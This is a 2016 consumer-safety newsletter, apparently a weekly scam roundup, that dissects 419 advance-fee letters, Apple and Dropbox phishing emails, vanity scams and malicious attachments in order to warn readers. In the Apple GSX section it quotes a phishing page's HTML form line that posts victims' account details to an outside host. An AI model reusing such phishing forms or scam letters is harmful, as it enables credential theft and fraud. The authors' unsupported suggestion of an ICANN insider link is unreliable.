Please support our effort by making a small donation. Thank you!

x

June 8, 2016

THE WEEK IN REVIEW

A couple of reminders to our readers. Scammers continue to use social engineering tricks disguised as political emails about Donald Trump. We most often see these malicious emails disguised as “CNN Reports” such as this one with the subject line Trump drops a BOMB.

 

 

 

Can you recognize “adance fee” scams? There are so many varieties of them but the most common are the “419 scams” named after the Nigerian 419 Penal Code from which they originated. A summary of them is simply that someone is going to send you money but you have to pay small fees to receive the funds. Of course the promise of money is a lie. While we think folks have to be incredibly gullible to fall for these scams, history has demonstrated that even some of the most intelligent and professional people are that gullible. Thousands of these scams are emailed weekly to Americans. Here’s a small list of them showing subject lines and sender addresses hitting one email server:

 

This 419 scam recently landed in our inbox. Enjoy!

From: alexdoku1@gmail.com
Time: 2016-05-30 11:24:43
Subject: Re: MORE DETAILS!!!

Dear Beneficiary,

My name is ( DAVID ABRAHAMOVICH ). I am a diplomatic investigation representative officer assigned for your long time beneficial intinerary procurement and immediate release of your consignment.

Kindly be inform that your deposited fund ($25-Million USD) of yellowed diplomatic tag Vaults has been released for immediate shipment and delivery to name and address.

Please contact the Diplomat Agent whose name and address appeared below for more details. In addition i will want you to kindly Re-confirm

  1. Your Full Name
  2. Current Home Address
  3. Nearest Airport
  4. Your Direct Cell Phone # So that he can make open a direct communication for your quicker arrangement for the delivery of the consignment to your home address.

Once again you should re-confirm your contact details to him immediately as directed:

Name: Mr Saad Al-Jamal
Email: saadaljama47@gmail.com

Best regards
DAVID ABRAHAMOVICH

 

 Sample Scam Subject Lines:

(1) New Position Open with Fortune 100 Company – Your hired

Approved sex pills

Apps for mobile phones

Auto repair stores

Cash Back Credit Cards 2016

Check out these money saving restaurant offers

Coupons for Dining Out

Explore options for reverse mortgage

Fix your golf game

Get your vehicle running like new again!

Put your money to work by investing in annuities today

Reduce your carbon footprint

Trump did it again – CNN Report

Sample Scam Email Addresses:

1inkoffer@inko.date

CarRentalDiscounts@9qu9.download

CheapContactLenses@lyob.download

DreamCars@carsexotic.download

HomeSecurityReviews@q9t0.download

info@overweightmelter.com

LifeInsurance@kingsingledating.top

manageheartburn@plainrelf.pro

RestaurantDeals@enjoycopn.top

SingleParentDatingServices@kingsingledating.top

survivecancer@cancerrealese.date

TAXLawyers@trarient.download

WillsandTrusts@smgp.download

 

 

 

Phish NETS: Apple iTunes Receipt, DropBox, and Apple GSX Account

This Apple phishing scam is your worst nightmare because it is so brilliantly crafted. Unlike most phishing scams pretending to be an account login notification, this email appears to be a receipt for a purchase for an Apple iTunes film rental in CAD (Canadian dollars). The recipient is asked if they have “issues with this transaction?” “If you haven’t authorized this transaction ,click the link below to get a full refund.”

The link isn’t even disguised but it is obfuscated. It begins with “senderapps-user” and also contains a folder named “canadaappleitunesinfostore” and a file named “secureinfoapple.html.” These are meant to trick the recipient into thinking this is a link to a secure Apple iTunes website in Canada. But this is not true. The actual domain in this link is from-pa.com. “senderapps-user” is a sub-domain. Anyone can create a sub-domain using any text or create a  file of any name. Sub-domain and file names don’t mean that they represent the real company! To help you understand domain names and what to pay attention to, visit our article Learn to Surf Safely by Understanding Website Domain Names.

Let’s look more closely at the domain from-pa.com. Google cannot find any website of that name. A WHOIS look up of this domain shows that it is owned by a legitimate company called Dyn (Dynamic Network Services). The domain was hacked and is now hosting a phishing site. We’ve informed Dyn. Our advice for readers…. Before reacting emotionally and too quickly to a false charge, look carefully at the sender’s email address AND the link you are about to click.

Then delete.

3a-Phish-Apple iTunes receipt

 

This next email wants you to believe it came from DropBox when, in fact, it is a phishing scam for your Dropbox credentials. It is not from DropBox.com even though the email’s “from” address says no-reply@dropboxmail.com. The address is being spoofed. The link from View Folder points to a hacked toy website in Russia called toy-moy.ru.   VirusTotal.com cites no fewer than seven security services identifying this link as malicious and phishing!

The phishers are back to their old tricks by targeting those who repair Apple computers and are “GSX” certified. Take the email below sent from gsx_notification@update.com. That isn’t from Apple.com. Subject line “inactivity of your account.” The email contains a clever web file titled “Verify_Form.shtml.” We’ve written about these many times in the past. The shtml file recreates the look and feel of the Apple GSX account information which the user is asked to update. However, instead of sending this information to Apple, the “Post” command shows that the information is sent to a strange website called arogant.bz

<form id=”command” name=”form1″ action=”http://arogant.bz/aci.php” method=”post” onsubmit=” return submitOnce(event); setFDC();”>

A WHOIS lookup of arogant.bz shows that the site was registered on May 30 and is being hosted in Russia. Definitely not Apple computer.

Delete!

Your Money: Credit Card Options and Benefits, Baby Formula, and Designer Glasses

We’re seeing a lot of malicious emails disguised as offers for credit card options like the two below. “All of the Credit, None of the Interest” and “Check out the benefits that Credit Cards have to offer and pick the best.” The first email comes from the strange website hhdiwo.download which was registered on May 31 by someone named Hatton Garden from London, GB. The second email makes no effort to disguise the crazy links or the spammy text. (The spammy text was actually copied from a March, 2015 essay on fish recognition and classification system published in UKEssays.com) Perhaps the scammers think that their domain CreditCareLove.com is enough to put aside any recipients suspicions. We have bad news about CreditCareLove.com. The domain was registered on June 2 by our archenemy Judy Santiago using Enom.com and the domain is being hosted in the Netherlands. Deeeleeete! (We’ve written about Judy’s malicious emails in four recent newsletters! April 13 and 20; May 11 and 18.)

6-Credit card benefits

This is a first! We’ve never seen scams targeting mothers with newborns. How low will these scammers go? They routinely prey upon the sick, the poor, the addicted…. And now a new low. They prey upon mothers looking for healthy baby formula choices. “Considering Formula for Your Baby?” Here are search results for Healthy Baby Formula. The link leads to the domain uteuti.download. This domain was registered by our new friend in London named Hatton Garden. (A Google search informs us that “Hatton Garden” is a London Jeweler, also a safe deposit company, and also the name of a street in London.) The domain was registered less than five hours before the email was sent using the heavily abused service called Alpnames.com.)

Delete!

 

Are you interested in designer eyeglasses? Let’s cut to the point and tell you that you won’t find them on this website named herbsuccessforyou.com.

Delete.

 

 

 

TOP STORY: Revisiting Vanity Scams – Who’s Who and Whatever This Is

Vanity scams are meant to appeal to the recipients ego as he or she is invited to join an “elite group of professionals” or some other ridiculous invitation. The classic vanity scam is an invitation to join a professional “Who’s Who” of Who-dom. Like some reverse Batesian mimicry, some of these scams are actually not meant to trick you into purchasing a useless certificate or directory with the names of all the people who wasted their money like you did. Some of these vanity scams are actually malicious and meant to infect your computer. Can you tell which scam these are below; the vanity scam or the malicious mimic?

“You’ve Been Accepted by Professional Who’s Who”

Dear , It is my pleasure to inform you that you may qualify for inclusion in the 2016 Professional Who’s Who Network.

On behalf of our Committee I salute your achievement and welcome you to our organization.

They don’t even know your name but they salute your achievement? This scam is the malicious mimic. The top-level domain gdn was only just made available by ICANN on March 16, 2016. We checked the ICANN registry for the domain oanight.gdn that was used in this scam email and ICANN tells us that it was not registered! Look for yourself: http://www.nic.gdn/whois.php We don’t even know HOW this is possible for criminals to misuse a new domain that ICANN itself says is not registered with Internet name servers. (ICANN is the governing body for Internet names) Could this be evidence of some kind of inside job connecting an ICANN employee to the criminal gangs? Can we call the FBI to investigate? No, because the ICANN-licensed company controlling all GDN top-level domains is located in Dubai, United Arab Emerites. Where the heck are the Internet police when you need them. Oh, we just remembered. They don’t exist.

Deeeleete!

And then there is this very curious vanity scam from 884d058d@gppdev.com. “Your social networking reputation has pre-qualified you to register with us…” It was sent to someone who’s social networking reputation is about as high as cow pasture meadow muffins. And what makes them think that we want to associate with them any way? Who are they exactly?

Your reputation on social networking sites like LinkedIn, Facebook and others entitle you for acceptance!

Complete our simple and short>complimentary application form and soon you’ll have access to the world’s top-rated network of pros, business people, top- and mid-level execs, entrepeneurs, and others looking to make a difference and enjoy success.

Read what is included in this offer below. It includes “exposure of yourself” and other valuable…. Things. And they really want you to join whatever this is because they give you no less than five links to finish your application!

The domain gppdev.com was registered long ago in 2011 using a privacy protection service in Canada so we’ll never know who’s behind this… Whatever this is. But if you want to “meet new friends and contacts,” have at it. Otherwise, all together we say….

Footnote: The email above includes “Email courtesey of Electronic Marketing Group” from Lakewood, CO. Besides the fact that they cannot spell courtesy properly, we wanted to remind readers that we exposed Electronic Marketing Group as a bogus company in our April 20 and April 27 newsletters.

FOR YOUR SAFETY: I’ve Shared a File, Shipment Delivery Problem, and a New Message From Your Bank Manager

During the last week we have seen the impact of hacking and misuse of email servers and accounts from a school and two organizations such as this one located in Gloucester, MA. The value of such malicious hacking is huge! Receiving an email from someone you know, especially a school or valued non-profit, is more likely to be trusted and result in the recipient clicking the malicious link.   This email, for example, with the subject line “View Document” leads the recipient to believe that the link is for a Google document. However, the link leads to a website named haoqin87.com. The website represents a Ph.D. candidate in computer graphics located in China.   His website has been hacked and now hosts malware. It pays to mouse-over links and look before you click.

 

“We could not deliver your parcel. Please, open email attachment to print shipment label.” What they meant to say is “please open email attachment so we can infect your computer.”

13-Shipment delivery problem

 

 

This email sent from a server in Bosnia and Herzegovina (2-letter country code = .ba) is a simple attempt to trick you into opening the malware inside the attached zip file.  It was not sent from your bank manager!

14-New message from bank manager

 

ON THE LIGHTER SIDE: Delivery of Your Debit Card

Dear TDS readers. We’re thinking about hanging up the fight for a safer Internet now that we’ve received this awesome offer from Kmart. And we weren’t even looking! However, this is too good to let go.

 

15-Job offer from Kmart

 

 

 

Until next week (maybe?), surf safely!